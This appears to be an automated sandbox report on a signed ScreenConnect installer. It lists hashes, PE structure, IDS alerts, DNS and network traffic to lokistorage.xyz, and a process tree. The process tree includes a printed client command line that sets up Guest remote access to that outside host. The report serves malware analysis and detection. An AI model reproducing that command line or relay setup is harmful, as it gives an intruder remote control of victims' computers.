                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):1.4191022846140333
                                                                Encrypted:false
                                                                SSDEEP:48:I4JupI+xFX4nT5hU74/dnHqcq56AdubSiV0d6S2070B3uQca2iQR6YEwg4pDgYro:JJcETXyCKpKfV0d6l/XtQopASfM4
                                                                MD5:60AEFF36A78AC0F71A3B5E6D10E6FC51
                                                                SHA1:25959448496FCB3BA2978C7798CE867A43173215
                                                                SHA-256:991C48FDCCEA7E22D6EEBA2776BE030E24C6E56E34BE88CC244E423395545BB5
                                                                SHA-512:D72F49BE72D506860BEF358B29B20D230492D3C7AB4F8850AEA7B229E055F0C25C6B655CBCD82E89A788745B4BCEE838DFA2E6F5753B305F778EE2ACF2A29234
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.455094074875908
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:tmpzNIZ0YQ.exe
                                                                File size:5'809'048 bytes
                                                                MD5:451079cd7676e46f571336c768a9e6f0
                                                                SHA1:1270abe5230d5ed13488cd55cd69854baa53b010
                                                                SHA256:29e369f7b7ee09c8b15a8dc133561d4d71e55c100eeff8d7e72d2c6016b179e9
                                                                SHA512:5cece05573bb2f9b2a8c7d92e2ce266f5c78fb6f46e53d07ae33d957df2a2b99338f8cd0eabda50ee15f52ac0ba297cbcecc551b36364adf4088ac444850039d
                                                                SSDEEP:98304:f4s6efPOEnXkHywo+EVhaecMUzG4uc96ob23sf:AfefPFZs6Uruc9XbZ
                                                                TLSH:BF46F101B3D599B9D5BF0678D87A42699A34BC048316C7FF93D4B9293E32BC04E32766
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                                Icon Hash:00928e8e8686b000
                                                                Entrypoint:0x4014ad
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:1
                                                                File Version Major:5
                                                                File Version Minor:1
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:1
                                                                Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                Signature Valid:true
                                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                Signature Validation Error:The operation completed successfully
                                                                Error Number:0
                                                                Not Before, Not After
                                                                • 17/08/2022 01:00:00 16/08/2025 00:59:59
                                                                Subject Chain
                                                                • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                Version:3
                                                                Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                Serial:0B9360051BCCF66642998998D5BA97CE
                                                                Instruction
                                                                call 00007F4AA8CADB2Ah
                                                                jmp 00007F4AA8CAD5DFh
                                                                push ebp
                                                                mov ebp, esp
                                                                push 00000000h
                                                                call dword ptr [0040D040h]
                                                                push dword ptr [ebp+08h]
                                                                call dword ptr [0040D03Ch]
                                                                push C0000409h
                                                                call dword ptr [0040D044h]
                                                                push eax
                                                                call dword ptr [0040D048h]
                                                                pop ebp
                                                                ret
                                                                push ebp
                                                                mov ebp, esp
                                                                sub esp, 00000324h
                                                                push 00000017h
                                                                call dword ptr [0040D04Ch]
                                                                test eax, eax
                                                                je 00007F4AA8CAD767h
                                                                push 00000002h
                                                                pop ecx
                                                                int 29h
                                                                mov dword ptr [004148D8h], eax
                                                                mov dword ptr [004148D4h], ecx
                                                                mov dword ptr [004148D0h], edx
                                                                mov dword ptr [004148CCh], ebx
                                                                mov dword ptr [004148C8h], esi
                                                                mov dword ptr [004148C4h], edi
                                                                mov word ptr [004148F0h], ss
                                                                mov word ptr [004148E4h], cs
                                                                mov word ptr [004148C0h], ds
                                                                mov word ptr [004148BCh], es
                                                                mov word ptr [004148B8h], fs
                                                                mov word ptr [004148B4h], gs
                                                                pushfd
                                                                pop dword ptr [004148E8h]
                                                                mov eax, dword ptr [ebp+00h]
                                                                mov dword ptr [004148DCh], eax
                                                                mov eax, dword ptr [ebp+04h]
                                                                mov dword ptr [004148E0h], eax
                                                                lea eax, dword ptr [ebp+08h]
                                                                mov dword ptr [004148ECh], eax
                                                                mov eax, dword ptr [ebp-00000324h]
                                                                mov dword ptr [00414828h], 00010001h
                                                                Programming Language:
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 build 21022
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x53747c.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x54a6000x3fd98
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x54e0000xea8.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x160000x53747c0x5376009031d2d9e81b0f6feb6373861cf5cdaaunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x54e0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                FILES0x163d40x85600PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.3967589473992502
                                                                FILES0x9b9d40x1a4400PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5110044479370117
                                                                FILES0x23fdd40x1ac00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.44113244742990654
                                                                FILES0x25a9d40x2f1320PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9811086654663086
                                                                FILES0x54bcf40x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                                RT_MANIFEST0x54d2f40x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                DLLImport
                                                                mscoree.dllCorBindToRuntimeEx
                                                                KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                                OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-11-12T18:40:32.519144+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.949709TCP
                                                                2024-11-12T18:41:10.092641+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.949712TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 12, 2024 18:40:25.887732029 CET497088041192.168.2.995.164.16.15
                                                                Nov 12, 2024 18:40:25.892728090 CET80414970895.164.16.15192.168.2.9
                                                                Nov 12, 2024 18:40:25.892834902 CET497088041192.168.2.995.164.16.15
                                                                Nov 12, 2024 18:40:27.315721989 CET497088041192.168.2.995.164.16.15
                                                                Nov 12, 2024 18:40:27.322499990 CET80414970895.164.16.15192.168.2.9
                                                                Nov 12, 2024 18:40:27.558588982 CET80414970895.164.16.15192.168.2.9
                                                                Nov 12, 2024 18:40:27.601705074 CET497088041192.168.2.995.164.16.15
                                                                Nov 12, 2024 18:40:27.606553078 CET80414970895.164.16.15192.168.2.9
                                                                Nov 12, 2024 18:40:27.909338951 CET80414970895.164.16.15192.168.2.9
                                                                Nov 12, 2024 18:40:27.910300970 CET80414970895.164.16.15192.168.2.9
                                                                Nov 12, 2024 18:40:27.910460949 CET497088041192.168.2.995.164.16.15
                                                                Nov 12, 2024 18:40:29.999551058 CET497088041192.168.2.995.164.16.15
                                                                Nov 12, 2024 18:40:29.999598026 CET497088041192.168.2.995.164.16.15
                                                                Nov 12, 2024 18:40:30.004740953 CET80414970895.164.16.15192.168.2.9
                                                                Nov 12, 2024 18:40:30.004755974 CET80414970895.164.16.15192.168.2.9
                                                                Nov 12, 2024 18:40:30.004851103 CET80414970895.164.16.15192.168.2.9
                                                                Nov 12, 2024 18:40:30.004861116 CET80414970895.164.16.15192.168.2.9
                                                                Nov 12, 2024 18:40:30.004947901 CET80414970895.164.16.15192.168.2.9
                                                                Nov 12, 2024 18:40:30.005002022 CET80414970895.164.16.15192.168.2.9
                                                                Nov 12, 2024 18:41:30.019479990 CET497088041192.168.2.995.164.16.15
                                                                Nov 12, 2024 18:41:30.025374889 CET80414970895.164.16.15192.168.2.9
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 12, 2024 18:40:25.809832096 CET5113853192.168.2.91.1.1.1
                                                                Nov 12, 2024 18:40:25.854595900 CET53511381.1.1.1192.168.2.9
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Nov 12, 2024 18:40:25.809832096 CET192.168.2.91.1.1.10xee54Standard query (0)lokistorage.xyzA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Nov 12, 2024 18:40:25.854595900 CET1.1.1.1192.168.2.90xee54No error (0)lokistorage.xyz95.164.16.15A (IP address)IN (0x0001)false

                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:12:40:15
                                                                Start date:12/11/2024
                                                                Path:C:\Users\user\Desktop\tmpzNIZ0YQ.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\tmpzNIZ0YQ.exe"
                                                                Imagebase:0xc20000
                                                                File size:5'809'048 bytes
                                                                MD5 hash:451079CD7676E46F571336C768A9E6F0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1418481996.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1395919475.0000000000C36000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1410867618.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:12:40:16
                                                                Start date:12/11/2024
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"
                                                                Imagebase:0x860000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:12:40:17
                                                                Start date:12/11/2024
                                                                Path:C:\Windows\System32\msiexec.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\msiexec.exe /V
                                                                Imagebase:0x7ff76f660000
                                                                File size:69'632 bytes
                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:4
                                                                Start time:12:40:18
                                                                Start date:12/11/2024
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding A147D8F4A2A0D4F5C5A36F7D0C7BF249 C
                                                                Imagebase:0x860000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:12:40:19
                                                                Start date:12/11/2024
                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4293031 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                Imagebase:0xc20000
                                                                File size:61'440 bytes
                                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:12:40:23
                                                                Start date:12/11/2024
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 52881A0F31505AA001D51A2B2FDDE9ED
                                                                Imagebase:0x860000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:12:40:23
                                                                Start date:12/11/2024
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 4081353BA27C3192F1069208B3FE053F E Global\MSI0000
                                                                Imagebase:0x860000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:12:40:23
                                                                Start date:12/11/2024
                                                                Path:C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=f323c95d-8cdd-41df-ba61-316036d00b41&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=Slawomirkowalski&c=PL&c=KUC&c=&c=&c=&c=&c=&c="
                                                                Imagebase:0x260000
                                                                File size:95'520 bytes
                                                                MD5 hash:826314610D9E854477B08666330940B5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:9
                                                                Start time:12:40:25
                                                                Start date:12/11/2024
                                                                Path:C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "6499763b-8fe0-474c-8e02-22f9c957ab00" "User"
                                                                Imagebase:0xd0000
                                                                File size:598'816 bytes
                                                                MD5 hash:AB5FA8D90645878D587F386D0E276C02
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.1491349532.00000000000D2000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.2661733750.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:10
                                                                Start time:12:40:27
                                                                Start date:12/11/2024
                                                                Path:C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "f01c433b-e368-416e-a09f-c16bb2e654cf" "System"
                                                                Imagebase:0x700000
                                                                File size:598'816 bytes
                                                                MD5 hash:AB5FA8D90645878D587F386D0E276C02
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.1544940596.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Reset < >
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1418229938.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5e00000_tmpzNIZ0YQ.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: 6a29b1e8130a897d50bc943b4576471383388a64b3f35ea04478b241f919bfae
                                                                  • Instruction ID: c27a7ae0d91896c2da9407a0abe00c05d63e5664efdac6cd8e5b5b7ce56b59b6
                                                                  • Opcode Fuzzy Hash: 6a29b1e8130a897d50bc943b4576471383388a64b3f35ea04478b241f919bfae
                                                                  • Instruction Fuzzy Hash: D7524974A00329DFDB15DF64D854B99BBB6FF89300F1092A9E80AA7350DB75AD81CF90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1418229938.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5e00000_tmpzNIZ0YQ.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: 29cd028bc3c3ee87c2d69bb38c01480d8fff7b00e91e606e5a38a0e7d83ed730
                                                                  • Instruction ID: 5859e0daba160b88619a7e870fcdea147d546c2155e1aae4eb182155b3b5095e
                                                                  • Opcode Fuzzy Hash: 29cd028bc3c3ee87c2d69bb38c01480d8fff7b00e91e606e5a38a0e7d83ed730
                                                                  • Instruction Fuzzy Hash: 13426B34A00329DFDB15DF64D854B9DBBB6FB88300F1082A9E80AA7354DB75AD81CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1418229938.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5e00000_tmpzNIZ0YQ.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 02d99aaee9a8216ac384e89277a60698c5715b5214098b935789c2e12916a48c
                                                                  • Instruction ID: f1413d3f9856de03dd6bca4da781384dbb1fec71ba3834d0eaf935998d04ac1f
                                                                  • Opcode Fuzzy Hash: 02d99aaee9a8216ac384e89277a60698c5715b5214098b935789c2e12916a48c
                                                                  • Instruction Fuzzy Hash: 14C23F74A00204DFDB24DF68C894AADB7B2FF88314F15A159E995AB3A5DB30ED81CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1418229938.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5e00000_tmpzNIZ0YQ.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3178a14d063a96f2fd87381143a3aae8797e4b350d33ed72f2444cbf8ef29e07
                                                                  • Instruction ID: 9a81b4b53154b58e3d5906e94a6f8126eca8e7339ca5c2fd5b81160e0fa0ff60
                                                                  • Opcode Fuzzy Hash: 3178a14d063a96f2fd87381143a3aae8797e4b350d33ed72f2444cbf8ef29e07
                                                                  • Instruction Fuzzy Hash: F262A374A007159FDB18DF69D890AAEBBF2FF88310B149529E855DB391DB34EC81CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1418229938.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5e00000_tmpzNIZ0YQ.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 94db79ff8b65f41ea3e28646674897655110c47f7ad2cc6e28ffe37b0eb32736
                                                                  • Instruction ID: 692681f464886dd1e7f382ea6d9809bc94debb89ddaeb2de465dec0a1da3b870
                                                                  • Opcode Fuzzy Hash: 94db79ff8b65f41ea3e28646674897655110c47f7ad2cc6e28ffe37b0eb32736
                                                                  • Instruction Fuzzy Hash: 69F19375B002199FDB14DF68C4949ADB7F2FF88310F14A529E95AAB3A1DB319D81CF80
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1409887472.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1b00000_tmpzNIZ0YQ.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 38$k/$7
                                                                  • API String ID: 0-2417570947
                                                                  • Opcode ID: 0c75a981cbfab2cf07bde8635ed8d67690a7f054073218e151b871238bf42336
                                                                  • Instruction ID: ab60ee8142c5f3c5e4811871a4e04b371920862f53ab10b266a7ad4bd0d8333e
                                                                  • Opcode Fuzzy Hash: 0c75a981cbfab2cf07bde8635ed8d67690a7f054073218e151b871238bf42336
                                                                  • Instruction Fuzzy Hash: 138106323103425BD706AB3CE8A069EBBE2EB892507448669D491CB384FF74FD45C7A6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1409887472.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1b00000_tmpzNIZ0YQ.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 38$k/$7
                                                                  • API String ID: 0-2417570947
                                                                  • Opcode ID: 001c9434ce8f13000b63fc44af679ea60149fc06e6da0b91b803ffce87fba26c
                                                                  • Instruction ID: ce0cf7cef70b18ded41dc946cafc67253aaed2945859ca4f802f41175936d00c
                                                                  • Opcode Fuzzy Hash: 001c9434ce8f13000b63fc44af679ea60149fc06e6da0b91b803ffce87fba26c
                                                                  • Instruction Fuzzy Hash: 1851C1313103425BC706AB7CE89466EBBE7EBC96603448669D856CB384FF74FD418BA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1418391871.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5e60000_tmpzNIZ0YQ.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: d
                                                                  • API String ID: 0-2564639436
